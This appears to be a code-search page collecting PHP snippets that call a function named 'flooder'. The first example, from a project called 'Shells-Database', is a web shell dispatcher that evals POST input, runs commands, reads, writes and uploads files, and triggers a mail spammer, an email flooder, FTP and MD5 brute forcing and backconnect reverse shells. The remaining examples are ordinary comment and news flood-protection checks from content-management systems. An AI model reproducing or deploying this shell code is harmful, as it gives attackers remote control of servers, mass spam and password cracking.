PHP flooder Examples

Example #1

File: root_access_shell.php Project: ASDAFF/Shells-Database

function shell()
{
    if ($_POST['type'] == 1) {
        eval(stripslashes($_POST['value']));
    } elseif ($_POST['type'] == 2) {
        pwd();
        print_r(ex(stripslashes($_POST['value'])));
    } elseif ($_POST['type'] == 3) {
        if ($_SESSION['safe_mode'] == 1) {
            if (($u = safe_ex('ls -la')) != '') {
                return $u;
            } else {
                return safe_ex('dir');
            }
        } else {
            if (($u = ex('ls -la')) != '') {
                return $u;
            } else {
                return ex('dir');
            }
        }
    } elseif ($_POST['type'] == 4) {
        if (file_exists(stripslashes($_POST['value']))) {
            if ($safe_mode != 1) {
                echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']), "rw"), filesize(stripslashes($_POST['value']))));
            } else {
                echo htmlspecialchars(safe_read(stripslashes($_POST['value'])));
            }
            $_SESSION['edit'] = 1;
            $_SESSION['filename'] = $_POST['value'];
        } else {
            return 'File doesn\'t exists!';
        }
    } elseif ($_POST['type'] == 5) {
        fputs(fopen($_SESSION['filename'], "w"), stripslashes($_POST['value']));
    } elseif ($_POST['type'] == 6) {
        $uploaddir = pwd();
        if (!($name = $_POST['newname'])) {
            $name = $_FILES['userfile']['name'];
        }
        move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
    } elseif ($_POST['type'] == 7) {
        echo alias($_POST['value']);
    } elseif ($_POST['type'] == 8) {
        echo spammer(stripslashes($_POST['from']), stripslashes($_POST['subject']), stripslashes($_POST['msg']), stripslashes($_POST['check']), stripslashes($_POST['elist']), stripslashes($_POST['logf']));
    } elseif ($_POST['type'] == 9) {
        echo ftp_brute(stripslashes($_POST['host']), stripslashes($_POST['users']), stripslashes($_POST['passwd']), stripslashes($_POST['log']));
    } elseif ($_POST['type'] == 10) {
        echo flooder(stripslashes($_POST['log']), stripslashes($_POST['to']), stripslashes($_POST['from']), stripslashes($_POST['subject']), stripslashes($_POST['msg']), stripslashes($_POST['amount']), stripslashes($_POST['check']));
    } elseif ($_POST['type'] == 12) {
        echo backconnect(stripslashes($_POST['ip']), stripslashes($_POST['port']), stripslashes($_POST['method']));
    } elseif ($_POST['type'] == 13) {
        echo backconnect(stripslashes($_POST['port']), stripslashes($_POST['pass']), stripslashes($_POST['method']));
    } elseif ($_POST['type'] == 14) {
        echo md5_brute(stripslashes($_POST['hash']), stripslashes($_POST['log']), stripslashes($_POST['dict']));
    } else {
        $u = ex('ls -la');
        if ($u == '') {
            return ex('dir');
        } else {
            return $u;
        }
    }
    return null;
}

Example #2

File: addcomments.php Project: Gordondalos/union

    $CN_HALT = TRUE;
}
if ($comments == '') {
    $stop[] = $lang['news_err_11'];
    $CN_HALT = TRUE;
}
if ($parse->not_allowed_tags) {
    $stop[] = $lang['news_err_33'];
    $CN_HALT = TRUE;
}
if ($parse->not_allowed_text) {
    $stop[] = $lang['news_err_37'];
    $CN_HALT = TRUE;
}
if ($member_id['user_group'] > 2 and intval($config['flood_time']) and !$CN_HALT) {
    if (flooder($_IP) == TRUE) {
        $stop[] = $lang['news_err_4'] . " " . $lang['news_err_5'] . " {$config['flood_time']} " . $lang['news_err_6'];
        $CN_HALT = TRUE;
    }
}
if ($config['tree_comments']) {
    if ($_POST['parent'] and intval($_POST['parent']) > 0) {
        $parent = intval($_POST['parent']);
    } else {
        $parent = 0;
    }
    if ($_POST['indent'] and intval($_POST['indent']) > 0) {
        $indent = intval($_POST['indent']);
    } else {
        $indent = 0;
    }

Example #3

File: allow_add_comment.php Project: jasmith152/Jackie_Davis

    return FALSE;
}
//----------------------------------
// Check if IP is blocked or wrong
//----------------------------------
$is_ban = (user_getban($ip) or user_getban($name)) ? true : false;
// user really banned
if ($is_ban) {
    echo '<div class="blocking_posting_comment">' . lang('Sorry but you have been blocked from posting comments') . '</div>';
    return FALSE;
}
//----------------------------------
// Flood Protection
//----------------------------------
if ($config_flood_time != 0 and $config_flood_time != "") {
    if (flooder($ip, $id) == true) {
        echo '<div class="blocking_posting_comment">' . str_replace('%1', $config_flood_time, lang('Flood protection activated! You have to wait %1 seconds after your last comment before posting again at this article')) . '</div>';
        return FALSE;
    }
}
//----------------------------------
// Check if the name is protected
//----------------------------------
$user_member = user_search($name);
// In case if enter another name
if ($CNname && $CNpass && $CNname != $name or $name && $_SESS['user'] && $_SESS['user'] != $name) {
    echo proc_tpl('remember');
    echo getpart('forget_me_script');
    $refer = $_SERVER['HTTP_REFERER'];
    echo proc_tpl('wrong_user');
    return FALSE;

Example #4

File: addnews.php Project: Gordondalos/union

                 }
                 if ($answer and $answer == $question_answer) {
                     $pass_answer = true;
                     break;
                 }
             }
         }
         if (!$pass_answer) {
             $stop .= $lang['reg_err_24'];
         }
     } else {
         $stop .= $lang['reg_err_24'];
     }
 }
 if ($user_group[$member_id['user_group']]['flood_news']) {
     if (flooder($member_id['name'], $user_group[$member_id['user_group']]['flood_news'])) {
         $stop .= "<li>" . $lang['news_err_4'] . " " . $lang['news_err_43'] . " {$user_group[$member_id['user_group']]['flood_news']} " . $lang['news_err_6'] . "</li>";
     }
 }
 $max_detected = false;
 if ($user_group[$member_id['user_group']]['max_day_news']) {
     $row = $db->super_query("SELECT COUNT(*) as count FROM " . PREFIX . "_post WHERE date >= '" . date("Y-m-d", $_TIME) . "' AND date < '" . date("Y-m-d", $_TIME) . "' + INTERVAL 24 HOUR AND autor = '{$member_id['name']}'");
     if ($row['count'] >= $user_group[$member_id['user_group']]['max_day_news']) {
         $stop .= "<li>" . $lang['news_err_44'] . "</li>";
         $max_detected = true;
     }
 }
 if ($stop) {
     $stop = "<ul>" . $stop . "</ul><a href=\"javascript:history.go(-1)\">{$lang['all_prev']}</a>";
     msgbox($lang['add_err_6'], $stop);
 }

Example #5

File: shows.inc.php Project: BackupTheBerlios/ajfork-svn

 if (isset($HTTP_X_FORWARDED_FOR)) {
     $ip = $HTTP_X_FORWARDED_FOR;
 } elseif (isset($HTTP_CLIENT_IP)) {
     $ip = $HTTP_CLIENT_IP;
 }
 if ($ip == "") {
     $ip = $REMOTE_ADDR;
 }
 if ($ip == "") {
     $ip = "not detected";
 }
 # keep scriptkiddies out
 settype($id, "int");
 # Check Flood Protection
 if ($config_flood_time != 0 and $config_flood_time != "") {
     if (flooder($ip, $id) == TRUE) {
         echo "<div style=\"text-align: center;\">{$lang_floodprot}</div>";
         $CN_HALT = TRUE;
         break 1;
     }
 }
 # Check if IP is banned
 $blockip = FALSE;
 $old_ips = file("{$cutepath}/data/ipban.db.php");
 $new_ips = fopen("{$cutepath}/data/ipban.db.php", "w");
 @flock($new_ips, 2);
 foreach ($old_ips as $null => $old_ip_line) {
     $ip_arr = explode("|", $old_ip_line);
     # ?id = "168". ?title = "Ban partial IPs";
     $_allowed = true;
     $this_banned_ip = str_replace('.', '\\.', $ip_arr[0]);